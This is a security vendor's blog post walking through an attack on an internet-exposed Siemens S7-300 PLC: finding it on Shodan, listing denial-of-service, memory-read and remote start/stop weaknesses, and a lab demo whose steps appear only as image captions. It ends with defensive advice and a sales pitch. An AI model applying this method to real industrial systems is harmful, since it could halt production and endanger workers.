There’s a party in your SCADA and you’re invited!

No, I’ve not gone insane, but I really know that it could be an actual “party” for the different factory workers if there’s a sudden fall (hack) in the production lines.
We’re going to see how easy an attack on an industry could be from the outside (or inside) and disturb all the workers at a factory.
We’re going to structure this cyber attack with a simple methodology:

Gathering information

It is a directed attack meaning that our attacker knows our OT (Operational technology).
But… how has this happened? My company has private security, no external workers can gain access without credentials.
It’s highly likely that your devices are exposed to the Internet and indexed by IoT platforms such as Shodan.
I won’t go into details about what Shodan is, but for common users, it’s like Facebook, but instead of looking for people, you look for devices that are connected to the Internet, either by its brand, model, IP/Host, company name, country, etc.
Going back to the case of this factory, we are going to check which information the cyber attacker has been able to get their hands on.
At the plant there is at least one PLC connected to the internet. Let’s zoom in:
The cyber attacker has revealed a Siemens Simatic S7-300 PLC working at our factory which has a vulnerable version with no holes in it.

Image of a Siemens Simatic S7-300 PLC

Looking for vulnerabilities

At this stage, the attacker will look for security failures or exploits that they could use in order to attack our PLC.
As we can see, this PLC has several vulnerabilities.
  1. Remote attack from Denial of Service (DoS): This attack will shut the PLC down there and then, by stopping the production line that is underway, they could cause an accident or even, a breakdown at other areas of the line.
  2. Remote memory visor: The attack uses the back door of the device to download the data from the PLC’s memory.
    This is useful to know which configured actions the hacked machine has; we could modify these actions and load them onto the PLC again to de-program the line or to provoke greater damage (accident at work, mechanical breakage on the line, changes for the chemical software in the material, reduction of the production speed, etc.).
  3. Start-up and stoppage of the CPU: Here we don’t need to say much, it stops and starts the line with just one remote command.

Exploitation or vulnerabilities

Thanks to the results obtained at previous stages, the attacker now has everything they need to attack our device and interrupt the whole shift.

Shall we get to work?

Let’s put ourselves in the skin of the cyber attacker. We will make a simulation of the exploitation of some of the vulnerabilities found:

Note: The simulations are made with a Siemens S7-300 PLC, on a local network in a controlled environment.



PLC information:

As we can see in the photo, the PLC is read-only and is only editable by entering a password, but the password is not enabled in order to gain access to it.

Remote attack from Denial of Service (DoS)

Even though there is an exploit to make a denial of service, it cannot be used in this instance, as the exploit works via port 80 and this PLC’s port is closed.

Having said that, we can’t make use of the remote memory visor exploit either, as it also needs for port 80 tobe open.

So, using the payload of the published exploit, I had to make one up to shut down the PLC.



CPU start-up and stoppage

As we mentioned before, this attack allows an attacker to start and stop the PLC remotely.

Shutting down the PLC

Attack from the attacker’s machine

Evidence of a stopped PLC

Turning on the PLC

Attack from the attacker’s machine

Evidence of a started PLC


What would this problem mean for an industry?

  • It causes accidents in the workplace.
  • It loses money due to the lack of machine availability.
  • It stops the rest of the areas in the plant.
  • It stops the logistics due to there not being material to load.
  • There are delays in orders due to a lack of stock.
  • It has a bad reputation and image for the company towards the public.
  • It creates extra costs for employee overtime to increase availability with more production lines underway.

It is the manufacturer’s fault?

No, it’s not always the manufacturer’s fault. In this example, we have used a Siemens device which is one of the biggest PLC brands on the market; it’s a brand that worries a lot about security, launching updates when there are vulnerabilities and due to the durability of its products.

That’s why we need to become more aware about protecting our SCADA systems, mainly by applying the corresponding updates, protecting systems, segmenting the network, making the appropriate audits and by having a SOC service in place that will monitor our network to detect and avoid intrustions and similar behaviour.

How has this happened?

In the same way that our computers and operating systems need updates to keep them stable and safe, our devices (PLCs, RTUs, HMIs…) also need to be taken care of.

We understand the difficulty of maintaining operating systems and software updated in the industry, and although there is technology, making the update on many occasions it isn’t in our hands due to an incompatibility in the operating systems and software, software with PLCs, etc.

Further to this, it would involve stopping the production lines which would lead to stoppage costs, a lack of stock and even a temporary loss in quality.

Alternatively, there is some technology that can perform a virtual update protecting the operating systems or common software components against vulnerabilities that could be exploitable, putting the plant at risk.

At Sothis we analyse and study the needs of each client to offer them a tailor-made service, which will enable them to make their SCADA system more modern and ensure it is safe, with the aim of avoiding cyber security issues that could lead to interruptions in production, the theft of industry information or even work security problems at the plant from threats to keep working safely.